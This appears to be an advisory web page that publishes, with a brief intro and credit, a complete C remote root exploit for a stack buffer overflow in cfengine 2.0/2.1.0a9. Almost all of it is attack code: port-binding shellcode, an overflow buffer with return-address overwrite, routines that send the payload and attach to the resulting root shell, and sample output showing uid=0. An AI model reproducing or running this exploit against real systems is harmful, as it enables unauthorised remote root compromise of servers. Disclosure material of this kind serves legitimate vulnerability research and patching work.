|
|
|
|
| |
As we reported in our previous article: Cfengine Remotely Exploitable Buffer Overflow (net.c), a remotely exploitable buffer overflow in Cfengine allows remote attackers to cause the program to execute arbitrary code.
The following exploit code is an improved exploit code for the mentioned vulnerability. |
| |
Credit:
The information has been provided by li0n7.
|
| |
Exploit:
/* Remote root exploit for cfengine-2.0/2.1.0a9 (stack-based overflow) by Li0n7
*
* Vulnerability discovered by Nick Cleaton (nick[at]cleaton[dot]net)
*
* Contact me: Li0n7[at]voila[dot]fr
*
* Visit us: www.ioc.fr.st (for those who can speak French)
*
* My world: l7l.linux-fan.com
*
* Here's an example:
* ./exploit -h localhost -p 5308 -t 0
* [+] Building evil string to send (using ret = 0xbf7fec10)...
* [+] Connected to 127.0.0.1 on port 5308
* [+] Payload sent
* [+] Trying to connect to 127.0.0.1 on port 26112...
* [+] Let's rock on!
* Linux Li0n7 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
*/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#define BACK 26112
#define RET 0xbf7fee04
#define PORT 5308
#define ERROR -1
#define BUFFERSIZE 4096
#define SIZE 4136
char shellcode[] = /* bighawk 78 bytes portbinding shellcode */
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";
struct os_ret_addr
{
int num;
char *plat;
long ret;
};
struct os_ret_addr exp_os[]=
{
{0,"slack 9.0",0xbf7fec10},
NULL
};
void
check_error(long host,int port)
{
if(!host)
{
fprintf(stderr,"[-] Host address incorrect,exiting...\n");
exit(ERROR);
}
if(port < 1 || port > 65535)
{
fprintf(stderr,"[-] Port \'%i\' incorrect,exiting...\n",port);
exit(ERROR);
}
return;
}
char
*build(long ret)
{
char *buffer,*ptr;
int i;
long *addr_ptr;
fprintf(stdout,"[+] Building evil string to send (using ret = 0x%x)...\n",ret);
buffer = (char *)malloc(SIZE+1);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
exit(ERROR);
}
ptr = buffer;
memset(ptr,0x90,SIZE);
memcpy(ptr,"3133337",7);
ptr += BUFFERSIZE-strlen(shellcode)-1000;
for(i=0;i<strlen(shellcode);i++)
*ptr++ = shellcode[i];
ptr += 1000;
addr_ptr = (long *)ptr;
for(i=0;i<120;i=i+4)
*(addr_ptr++) = ret;
ptr = (char *)addr_ptr;
*ptr = 0x0;
return buffer;
}
int
back_connection(long host)
{
struct sockaddr_in s;
u_char sock_buf[4096];
fd_set fds;
int fd,size;
char *command="/bin/uname -a ; /usr/bin/id;\n";
fd = socket(AF_INET, SOCK_STREAM, 0);
if (fd < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
exit(ERROR);
}
s.sin_family = AF_INET;
s.sin_port = htons(BACK);
s.sin_addr.s_addr = host;
if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
return ERROR;
}
fprintf(stdout, "[+] Let's rock on!\n");
size = send(fd, command, strlen(command), 0);
if(size < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
for (;;)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(fd, &fds);
if (select(255, &fds, NULL, NULL, NULL) == -1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
memset(sock_buf, 0, sizeof(sock_buf));
if (FD_ISSET(fd, &fds))
{
if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)
{
fprintf(stderr, "[-] Connection closed by remote host,exiting...\n");
close(fd);
exit(0);
}
fprintf(stderr, "%s", sock_buf);
}
if (FD_ISSET(0, &fds))
{
read(0, sock_buf, sizeof(sock_buf));
write(fd, sock_buf, strlen(sock_buf));
}
}
return 0;
}
void
set_connection(long host,int port,char *buffer)
{
struct sockaddr_in s;
struct hostent * hoste;
int fd,size;
fd = socket(AF_INET,SOCK_STREAM,0);
if(fd < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
exit(ERROR);
}
s.sin_family = AF_INET;
s.sin_addr.s_addr = host;
s.sin_port = htons(port);
if(connect(fd,(struct sockaddr *)&s,sizeof(s)) == -1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
fprintf(stdout,"[+] Connected to %s on port %i\n",inet_ntoa(s.sin_addr.s_addr),port);
size = send(fd,buffer,SIZE,0);
if(size < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
fprintf(stdout,"[+] Payload sent\n[+] Trying to connect to %s on port %i...\n",inet_ntoa(s.sin_addr.s_addr),BACK);
sleep(2);
close(fd);
}
long resolve_host(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
addr.s_addr = inet_addr(host_name);
if (addr.s_addr == -1)
{
host_ent = gethostbyname(host_name);
if (!host_ent) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
}
return(addr.s_addr);
}
void
die(char *argv)
{
fprintf(stderr,"\tCfengine 2-2.1.0a9 remote root exploit by Li0n7 (http://www.ioc.fr.st)\n");
fprintf(stderr,"\t Vulnerability discovered by Nick Cleaton (nick@cleaton.net)\n");
fprintf(stderr,"\t My world: http://www.l7l.linux-fan.com\n");
fprintf(stderr,"\t Contact me: Li0n7@voila.fr\n");
fprintf(stderr," Usage: %s -h <host> [-p <port>][-r <retaddr>][-t <num>]\n",argv);
fprintf(stderr," Example: %s -h localhost -p 5308 -t 0\n\n",argv);
fprintf(stderr," Platforms supported are:\n");
fprintf(stderr," num: %i - %s - 0x%x\n",0,exp_os[0].plat,exp_os[0].ret);
exit(ERROR);
}
int
main(int argc,char *argv[])
{
int i, option, port = PORT;
long ret = RET,host = 0;
char * option_list = "h:p:r:t:", buffer[SIZE+1];
opterr = 0;
if (argc < 4) die(argv[0]);
while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'h':
host = resolve_host(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 'r':
ret = atol(optarg);
break;
case 't':
ret = exp_os[atoi(optarg)].ret;
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
die(argv[0]);
}
check_error(host,port);
strncpy(buffer,build(ret),SIZE+1);
set_connection(host,port,buffer);
back_connection(host);
return 0;
}
/* A poil! */
|
|
|
|
|
